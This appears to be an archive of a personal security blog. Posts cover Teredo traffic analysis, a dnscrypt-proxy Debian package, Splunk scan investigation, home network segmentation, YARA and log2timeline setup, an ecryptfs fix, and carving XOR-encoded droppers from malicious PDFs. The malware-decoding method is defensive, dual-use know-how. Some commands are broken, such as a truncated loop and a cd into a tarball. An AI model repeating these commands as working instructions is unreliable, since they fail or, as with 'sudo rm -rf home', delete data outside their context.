Notes on Security and Research

Analysis of a Freshly Installed Windows 7's Teredo Tunneling Traffic

2012-01-07T19:43:00.001-05:00

While reviewing packet drops, I noticed a system that looked like a low, slow series of repeated failures.

Digging into it, I identified the system as our newly installed Windows 7 host. This seemed a bit odd. Most of the dropped packets were to a single destination, 65.55.158.118.

Searching through the DNS logs, I found that the IP was only involved in a request for teredo.ipv6.microsoft.com. The picture below shows the result of the query, however the googleusercontent.com return is an error in the way DNSMASQ mixes the logs for simultaneous return records. So, there is only one domain to IP relationship between teredo.ipv6.microsoft.com and 65.55.158.118.

To see the activity of just the traffic to this host, I decided to graph the activity to IP address 65.55.158.118 across all of the datasets. This would show the interrelationship of DNS, firewall, and proxy resources over the last seven days. I used this query in my Splunk search:

65.55.158.118 earliest=-7d | fields sourcetype | timechart limit=0 span=1h count(sourcetype) by sourcetype

The columns only indicated DNS and firewall would be factors since no proxy logs matched. I clicked 'Show Report' at the upper-right and selected a line graph with a logrithmic aspect. Here are my results:

So, my new Windows 7 host commits nearly constant DNS resolutions to teredo.ipv6.microsoft.com, resolves to 65.55.158.118, then sends roughly nine times as much direct traffic to that IP to die at the firewall as it is apparently not proxy aware.

My understanding has been that Microsoft disabled Teredo Tunneling by default after Windows XP Service Pack 1 due to industry concerns about data control. This is confirmed by a TechNet article released in 2007. A separate post found at the Microsoft Answers site indicates for Windows 7, "Teredo is installed by default and enabled so that it remains in a standby mode and comes into action only when required." Apparently not since it makes queries ALL THE TIME.

Teredo-by-default remains a potential security and data-loss issue for companies, many of whom lack tools to analyze the 6to4 wrapped protocol for network intrusion detection, enforcing proxy use for regulatory compliance, or other purposes. Some analysis of the protocol has been undertaken, as indicated by this Internet Storm Center article about a year ago, and followed by an execellent analysis by Johannes Ullrich in May. However, this level of depth in monitoring this protocol is not packaged or attainable to most businesses today.

To address the issue, administrators not utilizing Teredo for their domain should disable it via Global Policy. For home users of Windows 7 and Vista, this article at Windows Seven Forums provides instructions to disable the service.

In the Windows menu search bar, type 'cmd.exe', but don't open it. Right-click cmd.exe and select 'Run as Administrator'. Click Yes if prompted to confirm running the program with elevated privileges. Now follow the commands indicated in the output below:

C:\Windows\system32>netsh
netsh>interface
netsh interface>teredo
netsh interface teredo>set state disabled
Ok.

netsh interface teredo>exit

C:\Windows\system32>

Reboot the system to have the setting take effect.

Building a Debian/Ubuntu Package for DNSCrypt-proxy

2011-12-10T17:26:00.001-05:00

Referring to X4's issue for Linux compiling, the following are instructions for builiding a debian package.

Create a working directory. Then acquire the source by cloning the repository. Create a source tarball in the Debian package naming format.

    $ cd ~
    $ mkdir dnscryptworkdir
    $ cd dnscryptworkdir
    $ git clone https://github.com/opendns/dnscrypt-proxy
    $ mv dnscrypt-proxy dnscrypt-proxy-0.1
    $ tar cvfz dnscrypt-proxy_0.1.orig.tar.gz dnscrypt-proxy-0.1
    $ cd dnscrypt-proxy-0.1

Now it's time to lay the groundwork for the package. Use DebHelper to generate the package framework. If you haven't built a package before, install the necessary packages.

    $ sudo apt-get install build-essential devscripts ubuntu-dev-tools debhelper dh-make diff patch cdbs quilt gnupg \
     fakeroot lintian pbuilder piuparts

Use DebHelper to lay the package framework. This will generate the debian/ directory and associated files. Go ahead and remove the defaults. The README.Debian file is also unnecessary

    $ dh_make -f ../dnscrypt-proxy_0.1.orig.tar.gz -s -b
    $ cd debian
    $ rm *.ex *.EX
    $ rm README.Debian

Edit the control file with your favorite editor. It should look like this

    Source: dnscrypt-proxy
    Section: misc
    Priority: optional
    Maintainer: pinowudi
    Build-Depends: cdbs, debhelper (>= 7), automake
    Standards-Version: 3.8.3
    Homepage: https://github.com/opendns/dnscrypt-proxy

    Package: dnscrypt-proxy
    Architecture: all
    Depends: ${shlibs:Depends}, ${misc:Depends}
    Description: A tool for securing communications between a client and a DNS resolver.
     DNSCrypt is a slight variation on DNSCurve.
     .
     DNSCurve improves the confidentiality and integrity of DNS requests using high-speed high-security elliptic-curve cryptography. Best of all, DNSCurve has very low overhead and adds virtually no latency to queries.
     .
     DNSCurve aims at securing the entire chain down to authoritative servers. However, it only works with authoritative servers that explicitly support the protocol. And unfortunately, DNSCurve hasn't received much adoption yet.
     .
     The DNSCrypt protocol is very similar to DNSCurve, but focuses on securing communications between a client and its first-level resolver. While not providing end-to-end security, it protects the local network (which is often the weakest link in the chain) against man-in-the-middle attacks. It also provides some confidentiality to DNS queries.
     .
     The DNSCrypt daemon acts as a DNS proxy between a regular client, like a DNS cache or an operating system stub resolver, and a DNSCrypt-aware resolver, like OpenDNS.

Now edit the rules file. Using the CDBS packager makes implementing the autoconf features easy, with one exception. Since the autoconf has not been run already, it must be done before the package build. This will require the extra 'autoreconf' as a preconfiguration action. The rules file should look akin to the following.

    #!/usr/bin/make -f
    include /usr/share/cdbs/1/class/autotools.mk
    include /usr/share/cdbs/1/rules/debhelper.mk
    include /usr/share/cdbs/1/class/makefile.mk
    # Add here any variable or target overrides you need.
    makebuilddir/dnscrypt-proxy-0.1::
        autoreconf --install

Update the changelog file using the dce tool. Mark the issue as change number zero.

    $ dch -e
    dnscrypt-proxy (0.1-1) unstable; urgency=low

      * Initial release (Closes: #0)

     -- pinowudi Sat, 10 Dec 2011 14:11:02 -0500

Edit the copyright file with the copyright information from the package.

    This work was packaged for Debian by:

        pinowudi on Sat, 10 Dec 2011 14:01:36 -0500

    It was downloaded from

    Upstream Author(s):

        Frank Denis

    Copyright:

        Copyright (c) 2011 OpenDNS, Inc.

    License:

       Permission to use, copy, modify, and distribute this software for any
       purpose with or without fee is hereby granted, provided that the above
       copyright notice and this permission notice appear in all copies.

       THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
       WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
       MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
       ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
       WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
       ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
       OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.


       ====

       This license applies to all parts of dnscrypt-proxy that are not externally
       maintained libraries.

       The externally maintained libraries used by dnscrypt-proxy are:

      - NaCl (http://nacl.cr.yp.to/). Public domain.

      - libuv (https://github.com/joyent/libuv). MIT license.
        + libuv dependencies, see src/libuv/LICENSE.

      - alt_arc4random.c reuses code from OpenBSD. BSD license,
        see the alt_arc4random.c header.

    The Debian packaging is:

        Copyright (C) 2011 pinowudi

       Permission to use, copy, modify, and distribute this software for any
       purpose with or without fee is hereby granted, provided that the above
       copyright notice and this permission notice appear in all copies.

       THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
       WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
       MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
       ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
       WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
       ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
       OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

The software package does not have a .config file yet, so making one modification is necessary to get the CDBS manager to handle the package. Run autoreconfig to generate the autoconf files. Then execute the package build. The package should be produced in the directory below the current build dir.

    $ autoreconf --install
    $ debuild -us -uc
    $ ls ..
    dnscrypt-proxy-0.1 dnscrypt-proxy_0.1-1_all.deb dnscrypt-proxy_0.1-1.diff.gz dnscrypt-proxy_0.1-1.dsc dnscrypt-proxy_0.1-1_i386.build dnscrypt-proxy_0.1-1_i386.changes dnscrypt-proxy_0.1.orig.tar.gz

Now test the package installation.

    $ cd ..
    $ sudo dpkg -i dnscrypt-proxy_0.1-1_all.deb
    [sudo] password :
    Selecting previously deselected package dnscrypt-proxy.
    (Reading database ... 122394 files and directories currently installed.)
    Unpacking dnscrypt-proxy (from dnscrypt-proxy_0.1-1_all.deb) ...
    Setting up dnscrypt-proxy (0.1-1) ...
    Processing triggers for man-db ...
    $ whereis dnscrypt-proxy
    dnscrypt-proxy: /usr/sbin/dnscrypt-proxy /usr/share/man/man8/dnscrypt-proxy.8.gz
    $ dnscrypt-proxy -h
    dnscrypt-proxy 0.8
    Copyright (C) 2011 OpenDNS, Inc.

    Options:

-a    --local-address=...
-d    --daemonize
-e    --edns-payload-size=...
-h    --help
-k    --provider-key=...
-l    --logfile=...
-n    --max-active-requests=...
-p    --pidfile=...
-r    --resolver-address=...
-t    --tcp-port=...
-u    --user=...
-N    --provider-name=...
-P    --local-port=...
-V    --version

    Please consult the dnscrypt-proxy(8) man page for details.

Good to go!

Bigger Sets to Visualize

2011-09-08T21:53:00.003-04:00

After yesterdays post, I revisited the data and came up with a better static query. It now just looks for 40 byte packets fom port 12200. The supporting query looks like this:

The flash clearly indicates a ramp-up of scanning activity last month, but just how much? Open the Report Builder and re-render the data as a stacked area graph. Again, treat nullvalues as zero for this purpose.

Thats a pretty dramatic take-off from a wide selection of IP addresses. None of them have reverse DNS records, and all have with infrastructure-style WHOIS records. A brief review indicates several clusters of IP addresses at large virtual hostsers with a few smaller hosters and individual servers. Perhaps a compromised management console (remember CPanel?) or a clutch of vulnerable LAMP stacks?

Visualizing and Investigating a Distributed Scan

2011-09-08T00:48:00.001-04:00

I was checking my logs and trying out a new app I created for Splunk. Normally my graph looks like the one below, with the exception of one host that I recently added that was wildly dropping packets on the left. At the bottom-right, there are typically some bursts, but for the most part the averages are low. The scatterplots are fairly tight and low volume. For this packet length average vs. summation plot, most things cluster at the bottom left (low volume), occasionally blip into one of the upper-left (lots of low, slow) or lower-right (a few large packets) corners, and rarely pop-up in the upper-right (lots of big packets, blasting) quadrant. Here is an example:

Normal Dashboard

The Bird is the Word

Today I check the dashboard and the left side (ingress) looked remarkably different. The averages were pretty normal, but there was a steady baseline at the bottom. Also, the summation of dropped packets was much higher than the 'normal' sampling. The scatterplot also diverged more in the ~40 byte range, with a sample of hosts clearly engaged in a lot of small transactions. This peaqued my interest.

Abby Normal

And Now It's Time for Breakdown...

Investigating the increase in ingress summation (the chart at the bottom-right), I clicked the 'View Results' link on that chart. I then modified it slightly to reduce the number of extracted fields. This improved the search speed remarkably. I also eliminated the aggregate summing the 'timechart' command performs by default after the top 10, which returned all of the hosts. The 'limit=0' parameter achieved this. Now I had a chart that I could graph on a line chart and analyze more closely.

Prep for launch...

I adjusted the default settings slightly to treat null values as zero and added some axis labels. TIP: If you hover the mouse over one of the IP addresses in legend, Splunk highlights the line for that selection. I noticed the 58.218.199.0/24 IP addresses all have that matching bumpity-bump along the bottom, low and slow. This is pretty good evidence of an undiversified distributed scan. I decided to generate some better metrics.

Launch! Graph of FW drops over a timespan.

Which of these is Not Like the Others?

Looking at the rejected packet meta, I wanted to determine just how alike the packets were that were dropping from these hosts. I limited the search to just that subnet with a straight text search. Again, I limited the selected fields to improve the extraction speed. Then I created a timechart to bin by day the average packet length of each server involved. Once the search got underway, I clicked 'Show Report'.

In the Report Builder, I selected an area chart, treating nulls as zero, and stacked the results. As you see in this screenshot, the report showed the distribution of the packet sizes between the servers was even. The scanning cluster also ramped up just after a preliminary poke from a single server, 58.218.199.49.

Poke then plunge. This stacked area graph shows even traffic from the scanning cluster.

Peek-a-boo, I See You

Having identified the scanning cluster, I wanted to see what ports the aggressor was looking to find. During my investigation, I came across this comment at the Internet Storm Center website, followed by many other confirmatory posts at other sites, regarding the nature of the attacker. It appeared they have been active for a number of years.

After identifying the affected ports, I prettied it up a bit with a lookup table to provide the common uses of those ports. It became plain that the scanner was looking for open proxies, whether legitimate, ill-configured, left by malware, or just plain hacked. There were many supporting statements for all of these in the resources culled to identify these ports.

Proxy ports, proxy ports... Oh, more proxy ports. No secrets here.

Playing Favorites?

Now that I had an inkling what they were up to, I was interested in seeing if they favor certain ports. The data showed that the scanners were coordinated to test the target port set just about evenly.

Even distribution of scanned ports.

Summing It Up

It seems the aggressors utilizing these Chinese servers really like to scan for open proxies. Intent for such a collection, who can say? It could be folks looking for a way to circumvent Chinese proxy filters. However, judging from the technical coordination and longevity of this scanning behavior, it would seem more coordinated than that. In the least, better funded, and possibly sanctioned. Regardless of speculation, it is without doubt that the aggressors seek open proxy servers without permission, even trolling for botnet proxy remnants, and at the expense of those they locate when they turn on the tubes.

2011-08-29T22:30:00.001-04:00

This article is in response to a query about securing a FIOS network in a reasonable way for family and home use.

This design will create three separate zones. The first zone is the WAN, which simply picks up the IP address, routing, and DNS information from the FIOS servers. This implements the simple SPI firewall filters.

The second zone is the Trusted LAN, which will be locked down in what it can pass to the other zones. Why treat the Trusted LAN with less trust? Well, if we want to trust assets on that network, we need them to perform in compliant ways. So, instead of inherently trusting assets on that network, we enforce that that segment will act in an assured manner. This means implementing egress controls, limiting weird protocols, and forcing the use of proxies. Think of it less as 'a zone of trusted hosts' and more like 'a zone of hosts I need to trust'. These hosts are subject to more scrutiny as they or their data are more valuable.

The third zone is the DMZ. The hardened proxy/dns server goes in here, but the rest of that segment is for hosts that can't comply with the mandatory restrictions of the Trusted LAN. These are usually consumer appliance devices like iPods, iPads, tablets, video game consoles, Internet-enabled DVD players and the like. My rubric: consumer appliance devices that need Internet access to be useful but are too dumb to print.

I also recommend placing wireless connections into yet another zone to provide granular access controls. Wireless is typically the weakest infrastructure conduit in a home network, excluding PEBKAC. However, attaching wireless access points into the DMZ and Trusted zones may be suitable depending on your ability to secure them.

Pick list:

Pentium-3 class computer with 256 MB RAM. As this machine is likely 10 years old, purchasing an IDE-to-Compact Flash adapter with an 8GB CF card will give it some pick-up. Assuming there is already one Ethernet onboard the motherboard, this unit should have at least a PCI expansion port capable of supporting a 2- or 4-port Ethernet card. Keep in mind, three ports are required to make this configuration work. With a minimalist firewall OS, like m0n0wall, this will become a capable firewall.
Matching PCI 2- or 4-port Ethernet card. Server-class coprocessors by Intel are desirable.
Pentium-4 class computer with 512 MB RAM + 10GB drive. This machine is probably 5-7 years old and needs a little more spunk to deliver layer-7 services. Consider the above-mentioned PCI-to-CF converter for the base OS with a secondary drive for bulk storage. This will become the DMZ proxy and DNS services.
Pentium class computer, configuration negotiable, lots of bulk disk (fast I/O preferred). This machine will become the internal security auditor, receiving logs from the DMZ proxy and the firewall.

Bringing in the WAN

My FIOS installation has the unfortunate distinction of not using the Ethernet for the WAN connection, but bringing in the WAN backhaul over the COAX. This requires the use of a MOCA adapter to bridge the WAN to Ethernet. Since I don't have any spare MOCA units around and the COAX LAN to the video set-top boxes run over that same COAX line, that means using the ActionTec in a double-bridge confirguration, as documented in my previous post "Verizon FIOS Faux Paus".

Firewall Installation

Download and install m0n0wall on the firewall host. Once the steps are completed to create the double-bridge, or if you have Ethernet WAN, run the WAN line to eth1 of the firewall host. The default setup via the console of the FW host should allow for easy implementation of the WAN (eth1) and LAN (eth0) ports in simple no-ingress, all-egress configuration. Apply a common RFC 1918 private class-C subnet to the trusted LAN. e.g. 192.168.1.0/24.

Now set up the third interface as a DMZ (eth2). Set it up in standard SPI configuration: block ingress initiates, allow all outbound traffic. This will allow just about anything to work in this network. It also provides a nice guest network for visitors. Apply a different class-C subnet for the DMZ. e.g. 192.168.2.0/24

Connect the switches to the respective ports. You should definitely be using separate physical switches for each segment. Otherwise, employ VLAN tagging for the segments on a single switch that can support it. Wireless routers with integrated switches can serve this purpose, just use the Ethernet LAN ports, not the WAN port to avoid double NAT'ing. If using a switch with node presence, like most consumer-grade [wireless] routers, be sure to set the router IP to a private subnet not routable by that served by the LAN it is on. For example, on a 192.168.n.n LAN with a gateway of 192.168.n.1, the router management IP should be 10.n.n.n. Management of the switch should be performed by a direct hookup to a host with a static IP set to the same class-C subnet. It is not a perfect solution, but it will help prevent drive-by XSS exploits on weak router configuration pages and casual scans. Neither is it invisible, as described later. Routers are noisy things.

Establish Essential Services

With basic services going, it is time to establish control over essential services. This will be done on a host operating in the DMZ. This will provide it the access it requires to the Internet for services, make it available to both TRUSTED and DMZ hosts that might make use of it, and protect the TRUSTED network from probes should the box become compromised. However, if the host becomes compromised, it will give the attacker control over traffic direction (DNS) and content (proxy) for the TRUSTED net. I chose Ubuntu for the easy package management, though any *nix operating system should be appropriate. This box should be hardened and tightly monitored.

Most of the Internet operates via HTTP(S) after performing a DNS resolution. Therefore, controlling these protocols is essential to establishing control in the network. With the intent of completely locking down egress protocols on the TRUSTED LAN later on, a fully-featured proxy server is necessary. Caching is also a nice feature to reduce the load of things like updates, which most of the hosts on the network will be doing from Internet sources. SQUID provides caching support, access enforcement, and robust logging features.

Optionally, one can layer DansGuardian as a free regex-based enforcement layer on top of SQUID. It provides access controls suited for many common web ailments. Be advised, it will require a bit of tuning at setup to keep from blocking things like system updates. It also does not respond well for some foreign-language matches, which can become a burden. Otherwise, if you are technically inclined and have time to maintain your own custom lists, this is a great tool.

On the proxy host, also install DNSMASQ. This is the same utility that provides forwarding DNS and DHCP services on many wireless routers. We will only be using it for its DNS capabilities. Edit the dnsmasq configuration file to manually set OpenDNS as the DNS forwarders. OpenDNS provides filtered DNS resolution for free, protecting against many of the most obvious violations by botnet herders by default, even without an registered account. If you choosed to register and add your home network, you can gain further content control based on their domain categorizations.

Set the logging of both squid and dnsmasq to the syslog daemon. Modern syslog services, such as rsyslog and syslog-ng, are capable of filtering different program's logs into rotated files. Establish log directories and rotated log files for squid and dnsmasq. Also fork these feeds to the central syslog server (audit server) to be established later.

Locking Down

Now that DNS and Proxy services are established, adjust the configuration of the firewall. Change the default DHCP behavior from issuing the firewall's IP as the DNS passthrough to issuing the IP address of your proxy/dns server in the DMZ. This will encourage hosts to use the DMZ DNS server, which provides logging and domain access control. In the TRUSTED LAN, adjust your hosts' settings to use the proxy server in the DMZ. This is typically done by setting the proxy values to "http://proxyip:3128/", and selecting 'apply to all protocols'. For Windows boxes, this must be done in Internet Explorer to make system updates work, as well as any other installed browsers that do not integrate with IE's proxy settings. For Gnome Linux hosts, this is typically under System -> Preferences -> Network Proxy as the administrative user. When prompted, confirm 'apply systemwide'.

With hosts in the TRUSTED LAN using the proxy, the firewall can now be prepared to lock out all outbound protocols for that subnet. Establish a rule allowing http/s and dns traffic to the proxy server. Create a rule allowing syslog from the dmz proxy server into your trusted audit server. Establish another rule allowing SSH from the trusted server to the dmz proxy server. This will allow you to manage the proxy server to manage it after first authenticating to the trusted server. Prepare for a day where you will be able to monitor the blocked traffic from the firewall on your syslog server. There will be a few things like anti-virus software updates and email server access that may not respond well to the demand for a proxy server. These will have to be manually updated in the firewall as exceptions. There may be a rule explicitly allowing traffic from the LAN to the DMZ. It should be disabled. Now, as the last rule, reject everything sourced from the TRUSTED LAN. Apply and start watching the logs.

Wireless

If you have chosen to employ wireless, ensure that the wireless access points are configured to different ESSIDs and encryption keys. They do not service the same networks.

Review

In this post, we've reviewed locking down the network of hosts we need to trust, while still allowing non-proxy-capable devices an allowance to the Internet. The DMZ allows cart-blanche access to all devices, providing a network suitable for Internet-ready appliances and guests. The proxy services enforce proper accesses on the Trusted hosts and the DNS service logs all of the hosts requests.

Next time: Auditing the Logs

Review of a Clean Android Installation

2011-08-17T21:19:00.001-04:00

After acquiring a new Android device recently, I decided to profile the traffic. Using Splunk to analyze the traffic, I came up with this nice little chart. No surprises here.

Ecryptfs and profile errors

2010-11-11T11:10:00.001-05:00

I recently had an Ubuntu fail on ecryptfs. I would log into the system and it would present a default empty home dir with the Access-ecrypt-fs file. The problem was similar to these discussions on lost ecrypt profiles.

https://answers.launchpad.net/ecryptfs/+question/46307

http://ubuntuforums.org/showthread.php?t=1459250

My profile looked like this:

$ ls
Access-Your-Private-Data.desktop README.txt

$ ecryptfs-mount-private
ERROR: Encrypted private directory is not setup properly

After running an strace, I finally discovered that my movement of the /home directory contents had upset the delicate balance of ecryptfs. The program was not finding the .ecryptfs files it was looking for. ecryptfs profiles are not stored in your home directory, but rather are linked to another profile store.

$ ls -la
lrwxrwxrwx 1 user user 31 2010-09-07 21:51 .ecryptfs -> /home/.ecryptfs/user/.ecryptfs

The system had lost its way to /home/.ecryptfs/user/.ecryptfs. Fixing the links in /home recovered my encrypted profile.

$ ls -la /data1/home
total 16
drwxr-xr-x 4 root root 4096 2010-09-07 21:51 .
drwxrwxrwx 11 root root 4096 2010-09-26 10:42 ..
drwx------ 4 user user 4096 2010-09-25 22:00 user
drwxr-xr-x 3 root root 4096 2010-09-07 21:51 .ecryptfs

$ cd /
$ sudo rm -rf home
$ sudo ln -s /data1/home home

Scanning Memory Objects with Yara

2010-10-12T23:36:00.011-04:00

Below are some Python inserts to enable yara scanning of in-memory objects while parsing something, like a PDF. This particular example enables Yara signature scanning of parsed, filtered PDF objects via Didier Steven's PDF-Parser.

[...imports...]

import yara
import mmap
rules = yara.compile('path/rulefile')

[...parsing code...]

############################ yara insert around line 558
############################ just before
######### print ' %s' % FormatOutput(filtered, options.raw)

memmap=mmap.mmap(-1,len(filtered))
memmap.write(filtered)
memmap.seek(0)
matches = rules.match(data=memmap.read(len(filtered)))
memmap.close()
for m in matches:
__ print ' yara: %s' % (m)

##################################

[...resume Didier's code...]

print ' %s' % FormatOutput(filtered, options.raw)

Installing Yara on Ubuntu 10.04

2010-09-30T17:20:00.003-04:00

Installation for YARA on Ubuntu 10.04. First you will need the PCRE development and runtime libraries.

$ sudo apt-get install libpcre3 libpcre3-dev

Now acquire the YARA source code.

$ wget http://yara-project.googlecode.com/files/yara-1.4.tar.gz
$ wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz

Untar and configure YARA.

$ tar xvfz yara-1.4.tar.gz
$ cd yara-1.4.tar.gz
$ ./configure

If there are no errors, make the executables.

$ make
$ make check
$ sudo make install

Now add python support.

$ cd ..
$ tar xvfz yara-python-1.4.tar.gz
$ cd yara-python-1.4.tar.gz
$ python setup.py build
$ sudo python setup.py install

You should now be able to call YARA from a shell prompt.

$ yara
usage: yara [OPTION]... [RULEFILE]... FILE
options:
-t print rules tagged as and ignore the rest. Can be used more than once.
-i print rules named and ignore the rest. Can be used more than once.
-n print only not satisfied rules (negate).
-g print tags.
-m print metadata.
-s print matching strings.
-d = define external variable.
-r recursively search directories.
-f fast matching mode.
-v show version information.

Report bugs to:

Installing log2timeline on Ubuntu

2010-09-23T16:38:00.003-04:00

Here is a script to ease installation of Kristinn Gudjonsson's Log2Timeline tool on Ubuntu hosts. Tested on Ubuntu Lucid 10.04.

############################################
# log2timeline_ubuntu_deps.sh
############################################
#!/bin/sh
sudo apt-get install libdigest-crc-perl libnetpacket-perl libparse-win32registry-perl libarchive-zip-perl libtimedate-perl libcarp-assert-perl libclass-dbi-perl libdatetime-perl libhtml-scrubber-perl libnet-pcap-perl libparams-validate-perl libimage-exiftool-perl libdbd-sqlite3-perl libdate-manip-perl libdatetime-format-strptime-perl
sudo perl -MCPAN -e 'install File::Mork'
sudo perl -MCPAN -e 'install Data::Hexify'

Verizon FIOS Faux Paus

2010-08-10T21:50:00.001-04:00

Exemplifying the problem many folks have been having with Verizon FIOS, our router is version C of the Actiontec line. For the first two years of use, the bulk of our bandwidth was light web surfing and providng data to the VOD/Guide service for the DVR. Not very taxing on a 12Mb/s line. However, two things happened this year that started to tax the FIOS service, as provided by Verizon. First, we got an internet-ready DVD player. For this, we also signed up for NetFlix, an online movie service whose monthly subscription for online access to streaming content is less than a couple of video store rentals. We also discovered that our Wii had onboard wireless and had recently had software written for it to make it NetFlix compatible. This increased our bandwidth usage when streaming a movie by about ten fold. Unfortunately, the little NAT table in the ActionTec router just couldn't handle it and ended up crashing about every other day, requiring a manual power cycle. This just wouldn't fly, so, having spare hardware laying around and a desire to amp up the firewall capabilities of the home connection anyway, I decided to attempt to replace the Actiontec.

I followed the advice provided at DSLReports and set up a double-bridge bypass to my own firewall. This worked well for bypassing the NAT table issue... for about 20 days. After that, the Internet continued to work flawlessly, providing plenty of connections for the demands of streaming media, but the VOD/Guide services consistently failed due to the DVR's inability to pull an IP address. After a couple hours of poking at my firewall and the Actiontec, I found that the COAX (Ethernet) connection was not pulling an IP for the Actiontec, nor was it passing the bridge from the MOCA adapter for the STB. When I realized this, I looked at the configuration of the Actiontec router and saw that the COAX (Ethernet) interface was completely disabled. Now how could this be? It worked before. After re-enabling it and some power cycles, I determined that the Actiontec will only enable the device for the time it is powered on. For some reason, every so often it will self-reboot, which resets the device state to DISABLED, killing the VOD/Guide. ARGH!! So, to keep the STB working as it should, I have to attach to the Ethernet switch, manually set my IP address to the 192.168.1.0/24 net, enter the 192.168.1.1 default address, login, and reenable the COAX (Ethernet) device. What a pain, Verizon!

This also brings to light a security vulnerability in this method of double-bridging. The router automagically assigns itself this 192.168.1.1 address available from its Ethernet ports. As the Ethernet switch is bridged to the COAX (Broadband) device, this means that the router may be remotely accessible to an attack should an aggressor push spoofed RFC 1918 packets to your public IP address. They will drop off of the WAN firewall, but will the local ethernet bind to 192.168.1.1 answer? Since the Ethernet ports are set to make up the outer bridge to the WAN, this seems plausible, making for a potential hole in this setup. So much for adding security with a better firewall!

Automating PDF Analysis

2010-01-12T22:20:00.001-05:00

This post assumes a knowledge of basic LINUX commands. For help, consult the looping section of the BASH manual (http://linux.die.net/man/1/bash).

Suggested readings:

http://isc.sans.org/diary.html?storyid=7903
http://isc.sans.org/diary.html?storyid=7906
http://isc.sans.org/diary.html?storyid=7867
http://isc.sans.org/diary.html?storyid=7984

In response to these and other posts, I think it's time to get serious about 1) shortening the time from starting analysis to the determination of 'malicious' and 2) start tackling the massive numbers of these files swarming the enterprise. Both of these techniques require essentially the same techniques described above to me implemented in repeatable ways to script and automate them.

The malicious PDFs I've analyzed have a few things in common that will make this process easier. First, they almost always contain the dropper payload they want to execute. They usually come from free (gmail, yahoo, hotmail) or weakly secured (AOL, MSN) webmail accounts. And, best of all, the encoding scheme used to protect the droppers is always the same, a 255-byte decrementing XOR key.

So, to build a body of files for analysis, you want to start isolating or collecting all of the PDFs delivered from webmail accounts. Once you have these hundred or thousands of files, you need to start ripping through them and identifying the evil ones.

Before we start, get the latest version of Didier Stevens pdf-parser.py (http://blog.didierstevens.com/programs/pdf-tools/). Now, these pdf files sometime contain duplicate object numbers, lots of unlinked objects, and blobs in the unmapped spaces of the PDF (like after the %EOF tag). So, to begin, let's assume one hundred objects and start ripping all of the encoded/flated objects from the pdf. There will be a lot of blank objects since some don't exist in the PDF. Get rid of those with a remove statement on 0-length files.

$ mkdir pdf.analysis
$ cd pdf.analysis
$ cp ../1.pdf .
$ for (( i=0; i<100;> $i.out; done
$ rm `ls -l | egrep " 0 2010-" | awk '{ print $8}'`

Now we have a collection of extracted objects. As mentioned in Bojan's ISC Diary (http://isc.sans.org/diary.html?storyid=7867), we can search for failed FlateDecodes. This may indicate an intersting PDF for follow-up and can be an easy malicious PDF indicator.

$ grep failed *
31.out: FlateDecode decompress failed
31.out: FlateDecode decompress failed
Binary file 35.out matches
52.out: FlateDecode decompress failed
52.out: FlateDecode decompress failed

The malicious PDFs contain a dropper that is encoded. We've seen simple XOR encoding before, but the nefarious folk of the world appear to have moved into rotating XOR encoding techniques. The key is either incremented or decremented by some amount for every byte processed. When the keyset rotates to the end of the 0x00-FF scale, it turns the corner and picks up at the other end. So, to deal with this, I updated a previously written multi-byte XOR script to handle 256-byte rotating XOR keys with a given offset. Pair it with a for loop to cycle through all 256 possible start keys, and the encoded blob will be decoded and discovered with a simple GREP for a known string. Here's how it works. In this example, I had already located and carved the unknown blob from the PDF capsule. However, for automation you would can pass the entire PDF file and just not worry about the other bytes that will get mulched. We're only looking to identify the EXE, not carve it at this point.

$ for ((i=0; i<256; i++)); do echo $i; perl multi-xor-v2.pl -f 1.pdf -o $i.ex_ -k "$i" -R -1; done $ grep -i KERNEL *
Binary file 0.ex_ matches

Apparently the ROTXOR key starts at 0x00 and rotates at a decrement of -1 for every byte processed. The rotation is typical for PDFs of the day, though I have also seen different start points. Now that we have our decoded blob, the rest can be disposed of.

$ mv 0.ex_ Carved_decoded_ROTXOR255_key0_step-1.exe
$ rm *.ex_
$ ls
1.pdf Carved_decoded_ROTXOR255_key0_step-1.exe multi-xor-v2.pl

The .EXE can be run through standard analysis routines to discover the call-outs and second stage drops. This PDF is definitely malicious.

So, to take it to step two, addressing the large numbers of these PDFs, just take the above steps, codify into a script, and run in another loop.

$ mkdir pdf.analysis
$ cp *.pdf pdf.analysis
$ cd pdf.analysis
$ find . -type f -name *.pdf | while read i; do echo "processing $i"; ../analyzepdf.sh "$i"; done && find . -type -f -name *.exe | while read i; do echo "MATCH: $i"; done | tee matches.txt

The above loop creates a directory for analysis, creates an array of the PDF files available to be analyzed, and initiates the analysis script for each of them. The anlaysis script will create analysis subdirectories for each PDF, perform the above analysis steps and decodings, identify the interesting tidbits, and leave behind the interesting artifacts. When the loop finishes, the FIND command is used to locate the executables left behind, and create a notification for those PDFs found to have drops, recording this information to the matches.txt file.

Now you can revisit the PDFs identified in the matches .txt file and carve the droppers out of them.

$ dd if=1.pdf of=c1.bin bs=1 skip=27598 count=834887 && xxd c1.bin | less
834887+0 records in
834887+0 records out
834887 bytes (835 kB) copied, 1.7896 s, 467 kB/s

Apply the ROTXOR decoder scripts to the blob to reveal the executable.

$ for ((i=0; i<256; i++)); do echo $i; perl multi-xor-v2.pl -f c1.bin -o $i.ex_ -k "$i" -R -1; done $ grep KERNEL *
Binary file 0.ex_ matches

$ mv 0.ex_ Carved_decoded_ROTXOR255_key0_step-1.exe
